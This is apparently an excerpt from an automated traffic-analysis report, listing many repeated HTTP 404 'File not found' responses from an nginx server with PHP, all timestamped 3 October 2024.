Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:51 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
